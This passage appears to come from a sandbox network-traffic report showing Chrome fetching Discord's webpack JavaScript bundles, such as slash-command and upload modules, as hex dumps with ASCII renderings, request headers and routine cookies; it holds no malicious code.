6f 6c 6f 45 6d 6f 6a 69
                                                                          Data Ascii: tion(e,t,a){"use strict";a.r(t),a.d(t,{default:function(){return u}});var n=a("37983");a("884691");var l=a("414456"),s=a.n(l),i=a("943722"),r=a("462339");function u(e){let{activity:t,className:a,emojiClassName:l,textClassName:u,placeholderText:o,soloEmoji
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 4c 49 4e 47 2c 69 63 6f 6e 3a 69 2c 63 6f 6c 6f 72 3a 22 23 33 39 35 31 35 33 22 2c 73 69 7a 65 3a 6e 75 6c 6c 7d 2c 5b 6e 2e 48 61 6e 67 53 74 61 74 75 73 54 79 70 65 73 2e 47 41 4d 49 4e 47 5d 3a 7b 74 69 74 6c 65 3a 6c 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 53 54 41 54 55 53 5f 47 41 4d 49 4e 47 2c 69 63 6f 6e 3a 6f 2c 63 6f 6c 6f 72 3a 22 23 35 35 34 45 37 32 22 2c 73 69 7a 65 3a 6e 75 6c 6c 7d 2c 5b 6e 2e 48 61 6e 67 53 74 61 74 75 73 54 79 70 65 73 2e 46 4f 43 55 53 49 4e 47 5d 3a 7b 74 69 74 6c 65 3a 6c 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 53 54 41 54 55 53 5f 46 4f 43 55 53 49 4e 47 2c 69 63 6f 6e 3a 73 2c 63 6f 6c 6f 72 3a 22 23 37 32 35 46 34 45 22 2c 73 69 7a 65 3a 22 32 38 70 78 22 7d 2c 5b 6e 2e 48 61 6e 67 53
                                                                          Data Ascii: LING,icon:i,color:"#395153",size:null},[n.HangStatusTypes.GAMING]:{title:l.default.Messages.STATUS_GAMING,icon:o,color:"#554E72",size:null},[n.HangStatusTypes.FOCUSING]:{title:l.default.Messages.STATUS_FOCUSING,icon:s,color:"#725F4E",size:"28px"},[n.HangS
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 63 3a 75 2c 61 6c 74 3a 22 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 6e 75 6c 6c 21 3d 61 3f 61 3a 76 6f 69 64 20 30 7d 29 3a 6e 75 6c 6c 7d 7d 2c 37 35 30 31 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 55 70 6c 6f 61 64 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 45 44 49 54 49 4e 47 5f 43 4f 4e 54 41 49 4e 45 52 5f 57 49 44 54 48 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 2c 55 53 45 52 5f 42 41 4e 4e 45 52 5f 4d 41 58 5f 57 49 44 54 48 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 55 53 45 52 5f 42 41 4e 4e 45 52 5f 4d 41 58 5f 48 45 49 47 48 54 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75
                                                                          Data Ascii: c:u,alt:"",className:null!=a?a:void 0}):null}},75015:function(e,t,a){"use strict";a.r(t),a.d(t,{UploadTypes:function(){return s},EDITING_CONTAINER_WIDTH:function(){return u},USER_BANNER_MAX_WIDTH:function(){return o},USER_BANNER_MAX_HEIGHT:function(){retu


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          283192.168.2.550018162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:14 UTC866OUTGET /assets/94816.5a175ba33d20e66d2eca.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=6SN5FnduB0Lo2zfvOqmF58x6ckQbV5TI8RXJ1hgY_SI-1702226714570-0-604800000
                                                                          2023-12-10 16:45:15 UTC1130INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 38 36 34 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 39 38 38 36 39 33 37 30 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:15 GMTContent-Type: application/javascriptContent-Length: 88641Connection: closeCF-Ray: 8336f5098869370d-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:15 UTC239INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 39 34 38 31 36 22 5d 2c 7b 32 32 33 34 36 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 22 38 37 32 37 31 37 22 29 2c 6c 3d 6e 28 22 38 31 39 36 38 39 22 29 2c 61 3d 6e 28 22 34 39 31 31 31 22 29 2c 73 3d 6e 28 22 37 38 32 33 34 30 22 29 2c 6f 3d 7b 63 68 61 6e 67 65 4e 69 63 6b 6e 61 6d 65 3a
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["94816"],{223468:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return o}});var i=n("872717"),l=n("819689"),a=n("49111"),s=n("782340"),o={changeNickname:
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 28 65 2c 74 2c 6e 2c 6f 29 3d 3e 69 2e 64 65 66 61 75 6c 74 2e 70 61 74 63 68 28 7b 75 72 6c 3a 61 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 4d 45 4d 42 45 52 5f 4e 49 43 4b 28 65 2c 6e 29 2c 62 6f 64 79 3a 7b 6e 69 63 6b 3a 6f 7d 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 2e 74 68 65 6e 28 65 3d 3e 7b 6f 3d 65 2e 62 6f 64 79 2e 6e 69 63 6b 2c 6c 2e 64 65 66 61 75 6c 74 2e 73 65 6e 64 42 6f 74 4d 65 73 73 61 67 65 28 74 2c 6e 75 6c 6c 21 3d 6f 26 26 22 22 21 3d 3d 6f 3f 73 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 43 4f 4d 4d 41 4e 44 5f 4e 49 43 4b 5f 53 55 43 43 45 53 53 2e 70 6c 61 69 6e 46 6f 72 6d 61 74 28 7b 6e 69 63 6b 3a 6f 7d 29 3a 73 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 43 4f 4d 4d 41 4e 44 5f
                                                                          Data Ascii: (e,t,n,o)=>i.default.patch({url:a.Endpoints.GUILD_MEMBER_NICK(e,n),body:{nick:o},oldFormErrors:!0}).then(e=>{o=e.body.nick,l.default.sendBotMessage(t,null!=o&&""!==o?s.default.Messages.COMMAND_NICK_SUCCESS.plainFormat({nick:o}):s.default.Messages.COMMAND_
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 72 69 70 74 69 6f 6e 3a 61 2c 66 69 6c 65 6e 61 6d 65 3a 73 2c 73 70 6f 69 6c 65 72 3a 6f 2c 74 68 75 6d 62 6e 61 69 6c 3a 72 7d 3d 6c 3b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 55 50 4c 4f 41 44 5f 41 54 54 41 43 48 4d 45 4e 54 5f 55 50 44 41 54 45 5f 46 49 4c 45 22 2c 63 68 61 6e 6e 65 6c 49 64 3a 65 2c 69 64 3a 74 2c 66 69 6c 65 6e 61 6d 65 3a 73 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 61 2c 74 68 75 6d 62 6e 61 69 6c 3a 72 2c 73 70 6f 69 6c 65 72 3a 6f 2c 64 72 61 66 74 54 79 70 65 3a 6e 7d 29 7d 2c 73 65 74 55 70 6c 6f 61 64 73 28 65 29 7b 6c 65 74 7b 75 70 6c 6f 61 64 73 3a 74 2c 63 68 61 6e 6e 65 6c 49 64 3a 6e 2c 64 72 61 66 74 54 79 70 65 3a 6c 2c 72 65 73 65 74 53 74 61 74 65 3a 61 7d 3d 65 3b 69 2e 64 65 66
                                                                          Data Ascii: ription:a,filename:s,spoiler:o,thumbnail:r}=l;i.default.dispatch({type:"UPLOAD_ATTACHMENT_UPDATE_FILE",channelId:e,id:t,filename:s,description:a,thumbnail:r,spoiler:o,draftType:n})},setUploads(e){let{uploads:t,channelId:n,draftType:l,resetState:a}=e;i.def
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 3d 3d 3d 28 6e 3d 65 2e 66 69 6e 64 28 65 3d 3e 65 2e 6e 61 6d 65 3d 3d 3d 74 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 76 61 6c 75 65 7d 2c 52 3d 7b 5b 4d 2e 42 75 69 6c 74 49 6e 53 65 63 74 69 6f 6e 49 64 2e 42 55 49 4c 54 5f 49 4e 5d 3a 7b 69 64 3a 4d 2e 42 75 69 6c 74 49 6e 53 65 63 74 69 6f 6e 49 64 2e 42 55 49 4c 54 5f 49 4e 2c 74 79 70 65 3a 67 2e 41 70 70 6c 69 63 61 74 69 6f 6e 43 6f 6d 6d 61 6e 64 53 65 63 74 69 6f 6e 54 79 70 65 2e 42 55 49 4c 54 5f 49 4e 2c 67 65 74 20 6e 61 6d 65 28 29 7b 72 65 74 75 72 6e 20 76 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 43 4f 4d 4d 41 4e 44 5f 53 45 43 54 49 4f 4e 5f 42 55 49 4c 54 5f 49 4e 5f 4e 41 4d 45 7d 7d 2c 5b 4d 2e 42 75 69 6c 74 49 6e 53 65 63 74 69 6f 6e 49
                                                                          Data Ascii: ===(n=e.find(e=>e.name===t))||void 0===n?void 0:n.value},R={[M.BuiltInSectionId.BUILT_IN]:{id:M.BuiltInSectionId.BUILT_IN,type:g.ApplicationCommandSectionType.BUILT_IN,get name(){return v.default.Messages.COMMAND_SECTION_BUILT_IN_NAME}},[M.BuiltInSectionI
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 7d 2c 67 65 74 20 64 69 73 70 6c 61 79 44 65 73 63 72 69 70 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 43 4f 4d 4d 41 4e 44 5f 54 41 42 4c 45 46 4c 49 50 5f 44 45 53 43 52 49 50 54 49 4f 4e 7d 2c 6f 70 74 69 6f 6e 73 3a 5b 7b 6e 61 6d 65 3a 22 6d 65 73 73 61 67 65 22 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 6d 65 73 73 61 67 65 22 2c 74 79 70 65 3a 70 2e 41 70 70 6c 69 63 61 74 69 6f 6e 43 6f 6d 6d 61 6e 64 4f 70 74 69 6f 6e 54 79 70 65 2e 53 54 52 49 4e 47 2c 67 65 74 20 64 65 73 63 72 69 70 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 43 4f 4d 4d 41 4e 44 5f 54 41 42 4c 45 46 4c 49 50 5f 4d 45 53 53 41 47 45 5f 44 45 53 43 52 49 50 54 49 4f 4e
                                                                          Data Ascii: },get displayDescription(){return v.default.Messages.COMMAND_TABLEFLIP_DESCRIPTION},options:[{name:"message",displayName:"message",type:p.ApplicationCommandOptionType.STRING,get description(){return v.default.Messages.COMMAND_TABLEFLIP_MESSAGE_DESCRIPTION
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 6f 6e 49 64 3a 4d 2e 42 75 69 6c 74 49 6e 53 65 63 74 69 6f 6e 49 64 2e 42 55 49 4c 54 5f 49 4e 2c 67 65 74 20 64 65 73 63 72 69 70 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 43 4f 4d 4d 41 4e 44 5f 54 54 53 5f 44 45 53 43 52 49 50 54 49 4f 4e 7d 2c 67 65 74 20 64 69 73 70 6c 61 79 44 65 73 63 72 69 70 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 43 4f 4d 4d 41 4e 44 5f 54 54 53 5f 44 45 53 43 52 49 50 54 49 4f 4e 7d 2c 6f 70 74 69 6f 6e 73 3a 5b 7b 6e 61 6d 65 3a 22 6d 65 73 73 61 67 65 22 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 6d 65 73 73 61 67 65 22 2c 74 79 70 65 3a 70 2e 41 70 70 6c 69 63 61 74 69 6f 6e 43 6f 6d 6d 61 6e 64 4f 70 74 69 6f
                                                                          Data Ascii: onId:M.BuiltInSectionId.BUILT_IN,get description(){return v.default.Messages.COMMAND_TTS_DESCRIPTION},get displayDescription(){return v.default.Messages.COMMAND_TTS_DESCRIPTION},options:[{name:"message",displayName:"message",type:p.ApplicationCommandOptio
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 65 72 22 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 73 70 6f 69 6c 65 72 22 2c 74 79 70 65 3a 70 2e 41 70 70 6c 69 63 61 74 69 6f 6e 43 6f 6d 6d 61 6e 64 54 79 70 65 2e 43 48 41 54 2c 69 6e 70 75 74 54 79 70 65 3a 67 2e 41 70 70 6c 69 63 61 74 69 6f 6e 43 6f 6d 6d 61 6e 64 49 6e 70 75 74 54 79 70 65 2e 42 55 49 4c 54 5f 49 4e 5f 54 45 58 54 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 4d 2e 42 75 69 6c 74 49 6e 53 65 63 74 69 6f 6e 49 64 2e 42 55 49 4c 54 5f 49 4e 2c 67 65 74 20 64 65 73 63 72 69 70 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 43 4f 4d 4d 41 4e 44 5f 53 50 4f 49 4c 45 52 5f 44 45 53 43 52 49 50 54 49 4f 4e 7d 2c 67 65 74 20 64 69 73 70 6c 61 79 44 65 73 63 72 69 70 74 69 6f 6e 28 29 7b
                                                                          Data Ascii: er",displayName:"spoiler",type:p.ApplicationCommandType.CHAT,inputType:g.ApplicationCommandInputType.BUILT_IN_TEXT,applicationId:M.BuiltInSectionId.BUILT_IN,get description(){return v.default.Messages.COMMAND_SPOILER_DESCRIPTION},get displayDescription(){
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 49 43 4b 4e 41 4d 45 2c 74 29 7c 7c 45 2e 64 65 66 61 75 6c 74 2e 63 61 6e 28 4f 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 4d 41 4e 41 47 45 5f 4e 49 43 4b 4e 41 4d 45 53 2c 74 29 29 7d 2c 65 78 65 63 75 74 65 3a 28 65 2c 74 29 3d 3e 7b 76 61 72 20 6e 3b 6c 65 74 7b 67 75 69 6c 64 3a 69 2c 63 68 61 6e 6e 65 6c 3a 6c 7d 3d 74 3b 69 66 28 6e 75 6c 6c 3d 3d 69 29 72 65 74 75 72 6e 3b 6c 65 74 20 61 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 44 28 65 2c 22 6e 65 77 5f 6e 69 63 6b 22 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 22 22 3b 72 2e 64 65 66 61 75 6c 74 2e 63 68 61 6e 67 65 4e 69 63 6b 6e 61 6d 65 28 69 2e 69 64 2c 6c 2e 69 64 2c 4f 2e 4d 45 2c 61 7c 7c 22 22 29 7d 7d 2c 7b 69 64 3a 22 2d 31 30 22 2c 6e 61 6d 65 3a 22 74 68 72 65 61 64 22 2c 64 69 73 70 6c
                                                                          Data Ascii: ICKNAME,t)||E.default.can(O.Permissions.MANAGE_NICKNAMES,t))},execute:(e,t)=>{var n;let{guild:i,channel:l}=t;if(null==i)return;let a=null!==(n=D(e,"new_nick"))&&void 0!==n?n:"";r.default.changeNickname(i.id,l.id,O.ME,a||"")}},{id:"-10",name:"thread",displ
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 6c 6c 29 2c 22 53 6c 61 73 68 20 43 6f 6d 6d 61 6e 64 22 29 3b 63 2e 64 65 66 61 75 6c 74 2e 73 65 6e 64 4d 65 73 73 61 67 65 28 72 2e 69 64 2c 6d 2e 64 65 66 61 75 6c 74 2e 70 61 72 73 65 28 72 2c 73 29 29 7d 7d 2c 7b 69 64 3a 22 2d 31 31 22 2c 6e 61 6d 65 3a 22 6b 69 63 6b 22 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 6b 69 63 6b 22 2c 74 79 70 65 3a 70 2e 41 70 70 6c 69 63 61 74 69 6f 6e 43 6f 6d 6d 61 6e 64 54 79 70 65 2e 43 48 41 54 2c 69 6e 70 75 74 54 79 70 65 3a 67 2e 41 70 70 6c 69 63 61 74 69 6f 6e 43 6f 6d 6d 61 6e 64 49 6e 70 75 74 54 79 70 65 2e 42 55 49 4c 54 5f 49 4e 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 4d 2e 42 75 69 6c 74 49 6e 53 65 63 74 69 6f 6e 49 64 2e 42 55 49 4c 54 5f 49 4e 2c 67 65 74 20 64 65 73 63 72 69 70 74 69 6f 6e 28
                                                                          Data Ascii: ll),"Slash Command");c.default.sendMessage(r.id,m.default.parse(r,s))}},{id:"-11",name:"kick",displayName:"kick",type:p.ApplicationCommandType.CHAT,inputType:g.ApplicationCommandInputType.BUILT_IN,applicationId:M.BuiltInSectionId.BUILT_IN,get description(


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          284192.168.2.550019162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:14 UTC866OUTGET /assets/60499.862663374dc7b2606eb6.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=6SN5FnduB0Lo2zfvOqmF58x6ckQbV5TI8RXJ1hgY_SI-1702226714570-0-604800000
                                                                          2023-12-10 16:45:15 UTC1122INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 37 36 36 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 39 66 64 36 65 37 34 37 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:15 GMTContent-Type: application/javascriptContent-Length: 17665Connection: closeCF-Ray: 8336f509fd6e7477-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 30 34 39 39 22 5d 2c 7b 33 34 30 36 31 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 22 33 37 39 38 33 22 29 2c 6c 3d 72 28 22 38 38 34 36 39 31 22 29 2c 69 3d 72 28 22 31 33 32 37 31 30 22 29 2c 61 3d 72 2e 6e 28 69 29 2c 73 3d 72 28 22 37 37 30 37 38 22 29 2c 75 3d 72 28 22 38 31 32 32 30 34 22 29 2c 64 3d 72 28 22 36 38 35 36 36 35 22
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["60499"],{340616:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return c}});var n=r("37983"),l=r("884691"),i=r("132710"),a=r.n(i),s=r("77078"),u=r("812204"),d=r("685665"
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 32 2e 35 20 30 20 31 2e 32 35 20 31 2e 32 35 20 30 20 30 20 31 20 32 2e 35 20 30 5a 6d 2d 2e 37 37 20 33 2e 39 36 61 31 20 31 20 30 20 31 20 30 2d 31 2e 39 36 2d 2e 34 32 6c 2d 31 2e 30 34 20 34 2e 38 36 61 32 2e 37 37 20 32 2e 37 37 20 30 20 30 20 30 20 34 2e 33 31 20 32 2e 38 33 6c 2e 32 34 2d 2e 31 37 61 31 20 31 20 30 20 31 20 30 2d 31 2e 31 36 2d 31 2e 36 32 6c 2d 2e 32 34 2e 31 37 61 2e 37 37 2e 37 37 20 30 20 30 20 31 2d 31 2e 32 2d 2e 37 39 6c 31 2e 30 35 2d 34 2e 38 36 5a 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 64 7d 29 5d 7d 29 7d 7d 2c 39 36 30 34 36 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 65 74 20 6e 3b 72 2e 72 28 74 29 2c 72 2e 64 28
                                                                          Data Ascii: 2.5 0 1.25 1.25 0 0 1 2.5 0Zm-.77 3.96a1 1 0 1 0-1.96-.42l-1.04 4.86a2.77 2.77 0 0 0 4.31 2.83l.24-.17a1 1 0 1 0-1.16-1.62l-.24.17a.77.77 0 0 1-1.2-.79l1.05-4.86Z",clipRule:"evenodd",className:d})]})}},960460:function(e,t,r){"use strict";let n;r.r(t),r.d(
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 6c 2c 65 72 72 6f 72 3a 21 31 7d 29 2c 65 3d 3e 34 30 30 3d 3d 3d 65 2e 73 74 61 74 75 73 3f 7b 75 72 6c 3a 21 31 2c 65 72 72 6f 72 3a 65 2e 62 6f 64 79 7d 3a 7b 75 72 6c 3a 21 31 2c 65 72 72 6f 72 3a 22 45 72 72 6f 72 20 6d 61 6b 69 6e 67 20 41 50 49 20 72 65 71 75 65 73 74 20 28 22 2e 63 6f 6e 63 61 74 28 65 2e 73 74 61 74 75 73 2c 22 29 22 29 7d 29 7d 6e 3d 61 73 79 6e 63 20 65 3d 3e 7b 74 72 79 7b 61 77 61 69 74 20 61 2e 64 65 66 61 75 6c 74 2e 66 6c 75 73 68 43 6f 6f 6b 69 65 73 28 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 7d 2c 34 38 39 37 34 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 53 74 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d
                                                                          Data Ascii: l,error:!1}),e=>400===e.status?{url:!1,error:e.body}:{url:!1,error:"Error making API request (".concat(e.status,")")})}n=async e=>{try{await a.default.flushCookies()}catch(e){}}},489740:function(e,t,r){"use strict";r.r(t),r.d(t,{State:function(){return l}
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 75 72 6e 20 64 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 22 39 31 37 33 35 31 22 29 2c 6c 3d 72 2e 6e 28 6e 29 2c 69 3d 72 28 22 32 37 31 39 33 38 22 29 2c 61 3d 72 28 22 31 38 30 38 35 35 22 29 2c 73 3d 72 28 22 34 39 31 31 31 22 29 2c 75 3d 72 28 22 37 38 32 33 34 30 22 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 2c 72 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 74 29 72 65 74 75 72 6e 7b 76 61 6c 69 64 3a 21 31 2c 72 65 61 73 6f 6e 3a 75 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 42 55 49 4c 44 5f 4f 56 45 52 52 49 44 45 5f 49 4e 56 41 4c 49 44 7d 3b 6c 65 74 7b 72 65 6c 65 61 73 65 43 68 61 6e 6e 65 6c 3a 6e 2c 65 78 70 69 72 65 73 41 74 3a 64 2c 76 61 6c 69 64 46 6f 72 55 73 65 72 49 64 73 3a 6f 2c 61 6c 6c 6f 77 65 64 56 65
                                                                          Data Ascii: urn d}});var n=r("917351"),l=r.n(n),i=r("271938"),a=r("180855"),s=r("49111"),u=r("782340");function d(e,t,r){if(null==e||null==t)return{valid:!1,reason:u.default.Messages.BUILD_OVERRIDE_INVALID};let{releaseChannel:n,expiresAt:d,validForUserIds:o,allowedVe
